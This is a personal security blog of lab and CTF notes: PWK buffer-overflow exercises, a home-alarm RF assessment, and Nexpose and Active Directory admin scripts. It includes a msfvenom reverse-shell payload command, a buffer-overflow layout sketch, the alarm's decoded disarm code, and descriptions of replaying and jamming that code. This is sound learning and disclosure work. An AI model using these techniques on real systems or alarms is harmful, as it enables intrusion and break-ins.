- Personal website of Thomas Sluyter


Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I had a shaky understanding of the size figures displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 
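In hindsight the lesson is simple: only the "Payload size" line tells you how many bytes of shellcode must fit in the buffer; the "Final size of c file" includes all the C array formatting. A minimal sketch of the resulting layout (all values here are hypothetical placeholders, not the real vulnserver offsets):

```python
# Sketch of the classic stack overflow layout: the encoded payload must
# fit in the space before the four bytes that overwrite the saved
# return address (EIP). Offsets and addresses below are made up.

OFFSET_TO_EIP = 2003            # hypothetical: found with a cyclic pattern
PAYLOAD_SIZE = 351              # the "Payload size" line from msfvenom
FAKE_EIP = b"\xaf\x11\x50\x62"  # hypothetical little-endian gadget address

shellcode = b"\x90" * 16 + b"P" * PAYLOAD_SIZE  # NOP sled + stand-in payload
padding = b"A" * (OFFSET_TO_EIP - len(shellcode))
exploit = shellcode + padding + FAKE_EIP

# The payload (367 bytes with sled) fits comfortably before the EIP bytes.
assert len(shellcode) <= OFFSET_TO_EIP
print(len(exploit))  # 2007
```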

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 
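To illustrate the math (a sketch only; I'm not showing the exact instructions from the original exploit): `sub esp, 1000` uses the four-byte immediate form and encodes NULL bytes, while the single-byte immediate form tops out at 0x7f (127) and contains none, so you chain several copies to walk ESP backwards.

```python
import struct

# "sub esp, 1000" is encoded as 81 EC E8 03 00 00 -> contains NULL bytes,
# which would truncate the buffer.
sub_esp_1000 = b"\x81\xec" + struct.pack("<i", 1000)
assert b"\x00" in sub_esp_1000

# The imm8 form "sub esp, 0x7f" (83 EC 7F) is NULL-free; 0x7f is the
# biggest positive single-byte immediate.
SUB_ESP_7F = b"\x83\xec\x7f"
assert b"\x00" not in SUB_ESP_7F

def rewind_esp(distance, step=0x7f):
    """Build a NULL-free stub that moves ESP back by at least `distance`."""
    count = -(-distance // step)  # ceiling division
    return SUB_ESP_7F * count

stub = rewind_esp(600)
assert b"\x00" not in stub
print(len(stub) // 3 * 0x7f)  # total displacement: 635
```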

Learning points that I should look into:


PWK Labs: the first host falls

2017-01-29 20:41:00

Hotline Miami 2 logo

I thought I'd get a quick start on doing recon on the PWK labs. Using various enumeration and scanning techniques I've so far found 46 of the 50 hosts I expect to be in the public network. Beyond that, we'll see. For now, I wanted to get started on at least one box. One stood out, as it was found to have no less than ten open services. That looks promising!

It was a lot of fun exploring that box! What started with a simple credentials issue led me down the rabbit hole of multi-application LFI. While I got within inches of the goal using my own approach, I did not manage to clear that final hurdle. Some more research led me to an alternative approach in the same category, which flawlessly led to a shell. After that, the host proved rife with configuration issues that allowed privesc.

Onwards! I need to dig deeper into this box, to see what more I can find :)


PWK Labs lead times? Not today!

2017-01-27 12:28:00

Having finished 90% of my PWK exercises, it's time to get into the online labs! The final 10% of the exercises need lab access and I need a Windows VM with valid SLMail license. The OffSec website warns that usually there's a two to three week lead time on your lab access requests. Well apparently not today! I received an email at 12:27 that my lab access will start at 13:30 today. Ace!


OSCP and PWK studies: progress

2017-01-24 21:16:00

It's been a few weeks since I took the PWK (Pentesting With Kali Linux) course at TSTC in Veenendaal. After a short break, I've gone over the whole course book a second time: partly to keep the materials fresh in my head, but also to redo all of the exercises. By making a proper report of all the exercises, it's possible to qualify for 5 bonus points on the OSCP exam. Against a minimum passing score of 70 points, that's a pretty big deal!

I'm currently busting my head on chapter 8, on Linux buffer overflows, which wasn't handled in class. I'm fine on the general concepts and execution, but I'm running afoul of a conflict between the 64-bit EDB debugger and the 32-bit application used as an example. Things aren't playing 100% nice, with an unexpected segfault currently getting in my way.

After this, it's time to start my lab time. I've finished all the coursework as far as possible without using the labs, but now that can't be postponed anymore.


Offensive Security PWK - CTF

2016-12-16 12:37:00

Faraday Security pentest

So far I'm loving OffSec's live classroom PWK course (Pen-Testing with Kali Linux), mostly because it actually requires quite some effort while you're there. No slouching in your seats, but nose-to-the-grindstone hands-on work. But last night was a toughie! As part of the five-day course, the Thursday evening offers an additional CTF where all students can take part in attacking a simulated company.

The initial setup was quite similar to the events which I'd experienced at Ultimum and at KPMG: the contestants were divided into teams and were given VPN login details. In this case, the VPN connection led us straight into the target company's DMZ, of which we were given a basic sketch. A handful of servers were shown, as well as a number of routers/firewalls leading into SCADA and backoffice networks. As usual, the challenge was to own as many systems as possible and to delve as deeply into the network as you could.

Let me tell you, practicing coursework is something completely different from trying the real deal. Here we are, with 32 hours of practice under our belt and all of a sudden we're spoilt for choice. Two dozen target hosts with all manner of OSes and software. In the end my team concluded that it was so much that it'd left our heads spinning and that we should have focused on a small number of targets instead of going wide. 

Our initial approach was very nice: get together as a group, quickly introduce each other and then form pairs. With a team of 8-10 people, working individually leads to a huge mess. Working in pairs, not only would we have two brains on one problem, but it would also leave more room for open communication. We spent the first 45 minutes on getting our VPN connections working and on recon, each pair using a different strategy. All results were then poured into Faraday on my laptop, whose dashboard was accessible to our team mates through the browser. I've been using Faraday pretty extensively during the PWK course and I'm seriously considering using it on future assignments!

After three grueling hours our team came in second, having owned only one box and having scored minor flags on other hosts. I'm grateful that the OffSec team went over a few of the targets today, taking about 30min each to discuss the approach needed to tackle each host. Very educational and the approaches were all across the board :)


Continued RF hacking of a home alarm system

2016-10-21 10:57:00

Continuing where I left off last time (replay attack using a remote), I wanted to see how easy it would be to mess with the sensors attached to the Kerui home alarm system that I'm assessing. 

For starters, I assumed that each sensor would use the same HS1527 with a different set of data sent for various states. At least in the case of the magnet sensors, that assumption was correct. The bitstreams generated by one of the contacts are as follows:

As I proved last time, replaying any of these codes is trivial using an Arduino or similar equipment. Possible use cases for miscreants could include:

  1. Trick the alarm into thinking an open door is closed, before the alarm gets armed. That way the home owner does not get alerted about leaving something open when leaving the home. 
  2. Trick the alarm into thinking a window opened, after the alarm gets armed. Do this often enough, a few nights a week, and the home owner will get fed up with the alarm and just disable it. 

Going one step further, I was wondering whether the simple 433MHz transmitter for my Arduino would be capable of drowning out the professionally made magnet contacts. Using Suat Özgür's RC-Switch library again, I set the transmitter to continuously transmit a stream of ones. Basically, just shouting "AAAAAAAAAHHHHH!!!!!" down the 433MHz band.

Works like a charm, as you can see in the video below. Without the transmitter going, the panel hears the magnet contact just fine. Turning on the transmitter drowns out any of the signals sent by the contact.


First steps in hardware hacking

2016-10-05 08:23:00

Having come a long way in the RF-part of my current security project, I decided to dive into the hardware part of my research. The past few weeks have been spent with a loupe, my trusty multimeter, a soldering iron and some interesting hardware!

Cracking the shell of the Kerui G19 shows a pretty nice PCB! All ICs and components are on the backside, the front being dedicated to the buttons and the business end of the LCD panel. Opening the lid on the back immediately shows what look like unterminated service pins (two sets of'm), which is promising. 

What's less promising, is that the main IC is completely unmarked. That makes identifying the processor very hard, until I can take a crack at the actual firmware. My initial guess was that it's some ARM7 derivative, because the central panel mostly acts like a dressed-down feature phone with Android. A few weeks later that guess feels very, very off and it's most likely something much simpler. As user PedroDaGr8 mentioned on my Reddit thread about the PCB:

"Most people would assume an ARM in this case. In reality, it might be ARM, PIC, AVR, MIPS, FPGA, CPLD, H78, etc. Any of these could fulfill this role and function. It often depends on what the programmer or programming team is familiar with. I have seen some designs from China before, that used a WAY OVERKILL Analog Devices Blackfin DSP processor as the core. Why? Because it was cheaper to use the guys they had that were proficient at programming in Blackfin than to hire new guys for this one product."

So until I can analyse the firmware, the CPU could be just about anything! :D

There are many great guides online on the basics of hardware hacking, like devttys0's "Reverse engineering serial ports" or Black Hills Security's "We can hardware hack, and you can too!". Feeling confident in their teachings I took to those service pins with my multimeter. Sadly, both rows had a pin count inconsistent with UART consoles, but I didn't let that discourage me. Based on the measured voltages I hooked up my PL2303 UART-to-USB adapter, to see if I could find anything useful.

No dice. Multiple pins provided output onto my Picocom console, often with interspersed Chinese unicode characters. But no pins would react to input and the output didn't look anything like a running OS or logging. 

Between the lack of identification on the CPU and the lack of clear UART ports, it was time for hard work! I took a page from the book of Joffrey Czarny & Raphaël Rigo ("Reverse engineering hardware for software reversers", slide 11) and started mapping out all the components and traces on the PCB. Instead of using their "hobo method" with GIMP, I one-upped things by using the vector editor Inkscape. My first few hours of work resulted in what you see above: a mapping of both sides of the PCB and the interconnections of most of the pins.

Thus I learned a few things:

  1. Damn! There's at least one hidden layer of traces on the inside of the PCB. I have deduced the existence of a number of connections that cannot be visually confirmed, only by measuring resistance. 
  2. The service headers under the backside lid (CN11 and CN3) are both connected to the CPU, with CN3 probably having served to flash the firmware into the EN25F80 flash chip.

Status for now: lots of rewarding work and I have a great SVG to show for it. And I've gotten to know my Arduino and PL2303 a bit better. But I haven't found anything that helps me identify an OS or a console port yet. I'll keep at it!


First steps in RF hacking

2016-09-20 18:05:00

The first part of my current project that I wanted to tackle, was the "RF hacking" part: capturing, analyzing, modifying and replaying the radio signals sent and received by a hardware device.

Home alarm systems (or home automation systems in general) often use one of two RF bands: 433MHz or 868MHz. As far as I understand it, 433MHz is often used by lower-end or cheaper systems; I haven't figured out why just yet. In the case of the Kerui G19 alarm, the adverts tell you from the get-go that it uses 433MHz for its communications.

Cracking open one of the remotes I find one basic IC in there, the HS1527 (datasheet). The datasheet calls it an "OTP encoder", but I haven't figured out what OTP stands for in this case. I know "OTP" as "One Time Password" and that's also what the datasheet hints at ("HS1527 hai a maximum of 20 bits providing up to 1 million codes.It can reduce any code collision and unauthorized code scanning possibilities."), but it can't be that, because the Kerui remotes send out the exact same code every time. I found a short discussion online on the HS1527 that calls it a "learning code" as opposed to a "fixed code" (e.g. the PT2262), but the only difference I see is 'security through obscurity', because it simply provides a large address space. There is no OTP going on here!

The datasheet does provide useful information on how its bit patterns are generated and what they look like on the output. The four buttons on the remote are tied 1:1 to the K0 through K3 inputs, so even if HS1527 can generate 16 unique codes, the remote will only make four unless you're really fast. 

After that I spent a lot of time reading various resources on RF sniffing and on 433MHz communications. Stuff like LeetUpload's articles, this article on Random Nerd, and of course lots of information at Great Scott Gadgets. Based on my reading, I put together a nice shopping list:

And cue more learning! 

GQRX turns out to be quite user-friendly and while hard to master, isn't too hard to get a start with. It's even included with the Kali Linux distribution! Using GQRX I quickly confirmed that the remotes and control panel do indeed communicate around the 433MHz band, with the panel being at a slightly higher frequency than the remotes. With some tweaking and poking, I found the remote to use AM modulation without resorting to any odd trickery.

GQRX diligently gave me a WAV file that can be easily inspected in Audacity. Inspecting the WAV files indicated that each button-press on the remote would send out multiple repeats of the same bitstream. Zooming into the individual bitstreams you can make out the various patterns in the signal, but I had problems matching them to the HS1527 datasheet for the longest time. For starters, I never saw a preamble, I counted 25 bits instead of 20+4 (address+data), and the last 4 bits showed patterns that should only occur when more than one button was pressed.

Then it hit me: that 25th bit is the preamble! The preamble is sent back-to-back with the preceding bitstream. Doh!

Just by looking at the GQRX capture in Audacity, I can tell that the address of this particular remote is 10000100001100110001 and that 0010 is the data used for the "disarm" signal. 
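That interpretation is easy to check in code. A quick sketch that splits a received 24-bit HS1527 frame into its 20-bit address and 4-bit data, using the decimal value that RC-Switch reports further down:

```python
def decode_hs1527(code, bits=24):
    """Split a received HS1527 code into its 20-bit address and 4-bit data."""
    binary = format(code, "0{}b".format(bits))
    return binary[:-4], binary[-4:]  # address bits, then K3..K0 data bits

# 8663826 is the decimal value RC-Switch printed for the "disarm" button.
address, data = decode_hs1527(8663826)
print(address)  # 10000100001100110001
print(data)     # 0010
```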

Time for the next part of this experiment; let's break out the Arduino! Again, the Arduino IDE turns out to be part of the Kali Linux distro! Awesome! Some Googling led me to Suat Özgür's RC-Switch library, which comes with a set of example programs that work out-of-the-box with the 433MHz transceivers I bought.

Using the receiver and sniffing the "disarm" signal confirms my earlier findings:

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 9228,864,320,272,916,268,920,272,912,276,908,872,308,284,904,280,904,280,912,276,904,872,320,868,312,280,908,276,912,868,312,876,324,276,900,276,908,280,908,876,312,280,908,280,904,880,312,276,908,

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 14424,76,316,280,904,288,896,280,904,20,1432,36,1104,36,912,280,904,284,900,280,908,876,312,872,308,280,908,88,272,120,928,128,756,24,224,20,572,44,1012,32,800,24,188,32,964,68,1008,44,856,

The bitstream matches what I saw in Audacity. Using Suat's online parsing tool renders an image very similar to what we saw before.

So, what happens if we plug that same bitstream into the basic transmission program from RC-Switch? Let me show you!

If the YouTube clip doesn't show up: I press the "arm" button on the alarm system, while the Arduino in the background is sending out two "disarm" signals every 20 seconds.

To sum it up: the Kerui G19 alarm system is 100% vulnerable to very simple replay attacks. If I were to install this system in my home, then I would never use the remote controls and I would de-register any remote that's tied to the system.


New project: security assessment of a home security system

2016-08-24 20:58:00

(C) Kerui Secrui

Recently I've been seeing more and more adverts pop up for "cheap" and user-friendly home alarm systems from China. Obviously you're going to find them on Alibaba and MiniInTheBox, but western companies are also offering these systems and sometimes at elevated prices and with their own re-branding. Most of these systems are advertised as a set of a central panel, with GSM or Wifi connection, a set of sensors and a handful of remotes.

Between the apparent popularity of these systems and my own interest in further securing our home, I've been wanting to perform a security assessment of one of these Chinese home security systems. After suggesting the project to my employer, Unixerius happily footed the bill on such a kit, plus a whole bunch of extra lovely hardware to aid in the testing! 

For my first round of testing, I grabbed a Kerui G19 set from AliExpress.

I'm tackling this assessment as a learning experience, as I have no prior experience in most of the areas that I'll be attacking. I plan on having a go at the following:

The last item on the list is the only one I'm actually familiar with. The rest? Well, I'm looking forward to the challenge!

Has research like this been done before? Absolutely, I'm being far from original! One great read was Bored Hacker's "How we broke into your home". But I don't mind, as it's a great experience for me :)


Passed my CEH and took part in a CTF

2016-07-05 20:10:00

Today was a day well spent!

This morning I passed my CEH examination in under 45 minutes. Bam-bam-bam, answers hammered out with time to spare for coffee on my way to Amstelveen. A few weeks back I'd started this course expecting some level of technical depth, but in the end I've concluded that CEH makes a nice entry-level course for managers or juniors in IT. One of my colleagues in the SOC had already warned me about that ;) I still had lots of fun with my fellow IT Gilde members, playing around during the evening-time classes set up in cooperation with TSTC.

Why go to Amstelveen? Because it's home to KPMG's beautiful offices, which is where I would take part in a CTF event co-organized by CQure! This special event served as a trial-run for a new service that KPMG will be offering to companies: CTF as a training event. Roughly twenty visitors were split across four teams, each tackling the same challenge in a dedicated VM environment. My team consisted mostly of pen-testing newbies, but we managed to make nice headway by working together and by coordinating our efforts through a whiteboard. 

This CTF was a traditional one, where the players are assumed to be attacking a company's infrastructure. All contestants were given VPN configuration data, in order to connect into the gaming environment. KPMG took things very seriously and had set up separate environments for each team, so we could have free rein over our targets. The introductory brief provided some details about the target, with regards to their web address and the specific data we were to retrieve.

As I mentioned, our room was pretty distinct insofar as we were 90% newbies. Thus our efforts mostly consisted of reconnaissance and identifying methods of ingress. I won't go into details of the scenario, as KPMG intends to (re)use it for other teams, but I can tell you that it's pretty nicely put together. It includes scripts or bots that simulate end-user behaviour with regards to email and browser usage.

CQure and KPMG have already announced their follow-up to this year's CTF, which will be held in April of 2017. They've left me with a great impression and I'd love to take part in their next event!


Building the BoKS Puppet module

2016-04-20 20:35:00

Yesterday I published the BoKS Puppet module on Puppet Forge! So far I've sunk sixty hours into making a functional PoC, which installs and configures a properly running BoKS client. I would like to thank Mark Lambiase for offering me the chance to work on this project as a research consultant for FoxT. I'd also like to thank Ger Apeldoorn for his coaching and Ken Deschene for sparring with me. 

BoKS Puppet module at the Forge.

In case anyone is curious about my own build process for the Puppet module, I've kept a detailed journal over the past few months which has now been published as a paper on our website -> Building the BoKS Puppet module.pdf

I'm very curious about your thoughts on it all. I reckon it'll make clear that I went into this project with only limited experience, learning as I went :)


A very productive week: BoKS, Puppet and security

2016-04-17 00:28:00

I have had a wonderfully productive week! Next to my daily gig at $CLIENT, I have rebuilt my burner laptop with Kali 2016 (after the recent CTF event) and I have put eight hours into the BoKS Puppet module I'm building for Fox Technologies.  

The latter has been a great learning experience, building on the training that Ger Apeldoorn gave me last year. I've had a few successes this week, by migrating the module to Hiera and by resolving a concurrency issue I was having.

With regards to running Kali 2016 on the Lenovo s21e? I've learned that the ISO for Kali 2016 does not include the old installer application in the live environment. Thus it was impossible to boot from a USB live environment to install Kali on /dev/mmcblk1pX. Instead, I opted to reinstall Kali 2, after which I performed an "apt-get dist-upgrade" to upgrade to Kali 2016. Worked very well once I put that puzzle together.


CTF036 security event in Almere

2016-04-01 19:01:00

My notes from CTF036

A few weeks ago Almere-local consulting firm Ultimum posted on LinkedIn about their upcoming capture the flag event CTF036. Having had my first taste of CTF at last fall's PvIB event, I was eager to jump in again! 

The morning's three lectures were awesome!

The afternoon's CTF provided the following case (summarized): "De Kiespijn Praktijk is a healthcare provider which you are hired to attack. Your goal is to grab as many of their medical record identifiers as you can. Based on an email that you intercepted, you know that they have 5 externally hosted servers, 2 of which are accessible through the Internet. They also have wifi at their offices, with Windows PCs." The maximum score would be achieved by grabbing 24 records, for 240 points.

I didn't have any illusions of scoring any points at all, because I still don't have any PenTesting experience. For starters, I decided to start reconnaissance through two paths: the Internet and the wifi. 

As you can see from my notes it was easy to find the DKP-WIFI-D (as I was on the D-block) MAC address, for use with Reaver to crack the wifi password. Unfortunately my burner laptop lacks both the processing power and a properly sniffing wlan adapter, so I couldn't get in that way. 

I was luckier going at their servers:

  1. Sanne's home directory, which actually contained a text file with "important patients". BAM! Three medical records!!
  2. The /etc/shadow file had an easily crackable password for user Henk. Unfortunately that username+password did not let me access the .15 server through SSH or Webmin.
  3. Sanne has a mailbox! In /home/vmail I found her mailbox and it was receiving email! I used the Drupal site's password recovery to access her Drupal account. 

I thought I hadn't found anything using Sanne's account on the Drupal site. But boy was I wrong! 16:00 had come and gone when my neighbor informed me that I simply should have added q=admin to Sanne's session's URL. Her admin section would have given me access to six more patient records! Six!

Today was a well-spent day! My first time using Metasploit! My first time trying WPA2 hacking! Putting together a great puzzle to get more and more access :) Thanks Ultimum! I'm very much looking forward to next year's CTF!


Passed my NACA examination

2016-03-16 08:02:00

NACA logo

With many thanks to Nexpose consultant Mark Doyle for his trust in me and his coaching and with thanks to my colleagues at $CLIENT for offering me the chance to learn something new!

This morning I passed my NACA (Nexpose Advanced Certified Administrator) examination, with an 85% score.

While preparing for the exam I searched online to find stories of test takers, describing their experiences with the NCA and NACA exams. Unfortunately I couldn't really find any, aside from one blogpost from 2012. 

For starters, the exam will be taken through Rapid7's ExpertTracks portal. If you're going to take their test, you might as well register beforehand. Purchasing the voucher through their website proved to be interesting: I ran into a few bugs which prevented my order from being properly processed. With the help of Rapid7's training department, things were sorted out in a few days and I got my voucher.

The examination site is nice enough, though there are two features that I missed while taking the test:

  1. There is no option to mark your questions for review, a feature most computer-based exams provide.
  2. Even if you could mark your questions, there apparently is no index page that allows you to quickly jump to specific questions. 

I made do with a notepad (to mark the questions) and by editing the URL in the address bar, to access the questions I wanted to review. 

The exam covers 75 questions, is "open book" and you're allowed 120 minutes. I finished in 44 minutes, with an 85% score (80% needed to pass). None of the questions struck me as badly worded, which is great! No apparent "traps" set out to trick you.


Running Jira locally on Mac OS X

2016-03-10 19:39:00

Jira on OS X

It's no secret that I'm a staunch lover of Atlassian's Jira, a project and workload management tool for DevOps (or agile) teams. I was introduced to Jira at my previous client and I've introduced it myself at $CURRENTCLIENT. The ease with which we can outline all of our work and divide it among the team is wonderful and despite not actually using "scrum", we still reap plenty of benefits!

Unfortunately I couldn't get an official Jira project setup on $CUSTOMER's servers, so instead I opted for a local install on my Macbook. Sure, it foregoes a lot of the teamwork benefits that Jira offers, but at least it's something. Besides, this way I can use Jira for two of my other projects as well! 

Getting Jira up and running with a standalone installation on my Mac took a bit of fiddling. Even Atlassian's own instructions were far from bulletproof.

Here's what I did:

  1. Download the OS X installer for Jira. It comes as a .tgz.
  2. Extract the installer wherever you'd like; I even kept it in ~/Downloads for the time being.
  3. Make a separate folder for Jira's contents, like ~/Documents/Jira.
  4. Ensure that you have Java 8 installed on your Mac. Get it from Oracle's website.
  5. Browse to the unpacked Jira folder and find the script "". You'll need to change one line so it reads as follows, otherwise Jira won't boot: "$_RUNJAVA" -version 2>&1 | grep "java version" | (
  6. Find the files "" and "" and add the following lines at their top:
export PATH="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin:$PATH"
export JAVA_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JRE_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JIRA_HOME="/Users/thomas/Documents/Jira"

You should now be able to start up Jira from the Terminal by running the "" script. The best thing is that Jira handles a laptop's sleep mode just fine (at least it does so on OS X), so you can safely forget about your Terminal session and close it. I've had Jira run for days on end, with many sleeps and resumes each day!

Upgrading Jira should be as easy as downloading the latest archive (step 1) and then repeating steps 5 and 6 on the files from the new installation. All Jira data lives outside of the installation path, thanks to step 3.

EDIT: If you ever need to move your Jira data directory elsewhere (or rename it), then you'll need to re-adjust the setting of JIRA_HOME in the shell scripts. You will also need to change the database path in dbconfig.xml (which lives inside your Jira data directory).


Using the Nexpose API in Linux shell scripts to bulk-create users

2016-03-02 15:09:00

The past few weeks I've spent at $CLIENT, working on their Nexpose virtual appliances. Nexpose is Rapid7's automated vulnerability scanning tool, which may also be used in unison with Rapid7's more famous product: Metasploit. It's a pretty nice tool, but it certainly needs some work to get it all up and running in a large, corporate environment.

One of the less practical aspects of our setup is the creation of user accounts in Nexpose's web interface. Usually you'd have to click a few times and fill out a bunch of text fields for each user. This gets boring for larger groups of users, especially if you have more than one Security Console host. To make our lives a little easier, we have at least set up the hosts to authenticate against AD.

I've fiddled around with Nexpose's API this afternoon, and after a lot of learning and trying ("Van proberen ga je het leren!" as I always tell my daughter) I've gotten things to work very nicely! I now have a basic Linux shell script (bash, but should also work in ksh) that creates user accounts in the Nexpose GUI for you!

Below is a small PoC, which should be easily adjusted to suit your own needs. Enjoy!


# In order to make API calls to Nexpose, we need to setup a session.
# A successful login returns the following:
# <LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>
NexposeLogin() {
        echo -e "\n===================================="
        echo -e "\n===================================="
        echo -e "Admin username: \c"; read NXUSER
        echo -e "Admin password: \c"; read NXPASS
        LOGIN="<LoginRequest synch-id='0' password='${NXPASS}' user-id='${NXUSER}'></LoginRequest>"
        export NXSESSION=$(echo "${LOGIN}" | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $4}')
}
# Now that we have a session, we can make new users.
#    You will need to know the ID number for the desired authenticator.
# You can get this with: <UserAuthenticatorListingRequest session-id='...'/>
#    A user request takes the following shape, based on the API v1.1 docu.
#  <UserSaveRequest session-id='...'>
#  <UserConfig id="-1" role-name="user" authsrcid="9" authModule="LDAP" name="apitest2"
#   fullname="Test van de API" administrator="0" enabled="1">
#  </UserConfig>
#  </UserSaveRequest>
# On success, this returns:
#  <UserSaveResponse success="1" id="41">
# </UserSaveResponse>
NexposeCreateUser() {
        NEWUSER="${1}"      # user name, passed as the first argument
        NXROLE="${NXROLE:-user}"  # Nexpose role name; defaults to "user" unless set elsewhere
        NXAUTHENTICATOR="9" # You must figure this out from Nexpose, see above
        SCRATCHFILE="/tmp/$(basename ${0}).temp"
        echo "<UserSaveRequest session-id='${NXSESSION}'>" > ${SCRATCHFILE}
        echo "<UserConfig id='-1' role-name='${NXROLE}' authsrcid='${NXAUTHENTICATOR}' authModule='LDAP' name='${NEWUSER}' fullname='${NEWUSER}' administrator='0' enabled='1'>" >> ${SCRATCHFILE}
        echo "</UserConfig>" >> ${SCRATCHFILE}
        echo "</UserSaveRequest>" >> ${SCRATCHFILE}
        SUCCESS=$(cat ${SCRATCHFILE} | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $2}')
        [[ ${SUCCESS} -eq 0 ]] && logger ERROR "Failed to create Nexpose user ${NEWUSER}."
        rm ${SCRATCHFILE}
}

NexposeCreateUser apitest1
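The awk -F\" '{print $4}' trick used in NexposeLogin simply grabs the fourth double-quote-delimited field, which happens to be the session-id attribute's value in the login response. A quick standalone sketch, using the sample response from the comments above, to illustrate:

```shell
# Sample LoginResponse, as shown in the comments above
RESPONSE='<LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>'

# Split on double quotes: field 4 is the value of the session-id attribute
NXSESSION=$(echo "${RESPONSE}" | head -1 | awk -F\" '{print $4}')
echo "${NXSESSION}"   # prints F7377393AEC8877942E321FBDD9782C872BA8AE3
```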


Changing users' passwords in Active Directory 2016, from anywhere

2016-01-04 09:28:00

As part of an ongoing research project I'm working on, I've had the need to update an end-user's password in Microsoft's Active Directory. Not from Windows, not through "ADUC" (AD Users and Computers), but from literally anywhere. Thankfully I stumbled upon this very handy lesson from the University of Birmingham.

I've tweaked their example script a little bit, which results in the script shown at the bottom of this post. Using said script as a proof of concept, I was able to show that the old-fashioned way of using LDAP to update a user's password in AD still works on Windows Server 2016 (as that's the target server I run AD on).


Called as follows:

$ php encodePwd.php user='Pippi Langstrumpf' newpw=Bora38Sr > Pippi.ldif

Resulting LDIF file:

$ cat Pippi.ldif 
dn: CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl
changetype: modify
replace: unicodePwd

Imported as follows:

$ ldapmodify -f Pippi.ldif -H ldaps:// -D 'CN=Administrator,CN=Users,DC=broehaha,DC=nl' -W
Enter LDAP Password: 
modifying entry "CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl"

Once the ldapmodify has completed, I can login to my Windows Server 2016 host with Pippi's newly set password "Bora38Sr".
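For what it's worth, the same unicodePwd encoding can also be produced in the shell, without PHP: AD expects the new password wrapped in double quotes, converted to UTF-16LE, and then base64-encoded for the LDIF. A quick sketch:

```shell
# Encode a password for AD's unicodePwd attribute:
# wrap it in double quotes, convert to UTF-16LE, then base64-encode.
printf '"Bora38Sr"' | iconv -f UTF-8 -t UTF-16LE | base64
# → IgBCAG8AcgBhADMAOABTAHIAIgA=
```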



<?php
function EncodePwd($pw) {
  $newpw = '';
  $pw = "\"" . $pw . "\"";
  $len = strlen($pw);
  for ($i = 0; $i < $len; $i++)
      $newpw .= "{$pw{$i}}\000";
  $newpw = base64_encode($newpw);
  return $newpw;
}

if($argc > 1) {
  foreach($argv as $arg) {
    list($argname, $argval) = split("=", $arg);
    $$argname = $argval;
  }

  $userdn = 'CN='.$user.',CN=Users,DC=broehaha,DC=nl';

  $newpw64 = EncodePwd($newpw);

  echo <<<EOT
dn: $userdn
changetype: modify
replace: unicodePwd
unicodePwd:: $newpw64

EOT;
}
?>


Integrating BoKS and Windows Active Directory

2015-12-18 10:59:00

As part of an ongoing research project for Fox Technologies I had a need for a private Windows Active Directory server. Having never built a Windows server, let alone a domain controller, it's been a wonderful learning experience. The following paragraphs outline the process I used to build a Windows AD KDC and how I set up the initial connections from the BoKS hosts.


Windows server setup

I run all my tests using the Parallels Desktop virtualization product. The first screenshot below will show five hosts running concurrently on my Macbook Air: a Windows Server 2012 host and four hosts running RHEL6 (BoKS master, replica and two clients). 

Even installing Windows Server 2012 proved to be a hassle, in that the .ISO image provided by Microsoft (for evaluation purposes) appears to be corrupt. Every single attempt to install resulted in error code 0x80070570 halfway through. This is a known issue and the only current workaround appears to lie in using an alternative ISO image provided by a good samaritan. Of course, one ought to be leery about using installation software not provided by the actual vendor, so caveat emptor.

Once the installation has completed, set up basic networking as desired. Along the way I opted to disable IPv6, as leaving it enabled would make the setup and troubleshooting of Kerberos a bit more complicated.

Next up, it's time to add the appropriate Roles to the new Windows server. This is done through Windows Server Manager: from the "Manage" menu, pick "Add roles and features". Add:

This tutorial by Rackspace quickly details how to setup the Domain Services. In my case I set up the forest "" which matches the name of the domain (and my LDAP directory on Linux). Setting up the CA (certificate authority) requires stepping through a wizard, using the default values provided. 

BoKS will also require the installation of the (deprecated) role Identity Manager for Unix. Microsoft provide excellent instructions on how to install these features on Windows 2012, through the command line. In short, the commands are (NOTE the disabling of NIS):

Dism.exe /online /enable-feature /featurename:adminui /all
Dism.exe /online /disable-feature /featurename:nis /all
Dism.exe /online /enable-feature /featurename:psync /all


The Windows AD KDC should be in sync with the time on the Linux hosts. Set up NTP to use the same NTP servers as follows:

w32tm /config / /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time


Export the root CA certificate by running:

certutil -ca.cert windows_ca.crt >windows_ca.txt
certutil -encode windows_ca.crt windows_ca.cer


You may now SCP the windows_ca.cer file to the various Linux hosts (for example by using pscp, from the Putty team). 

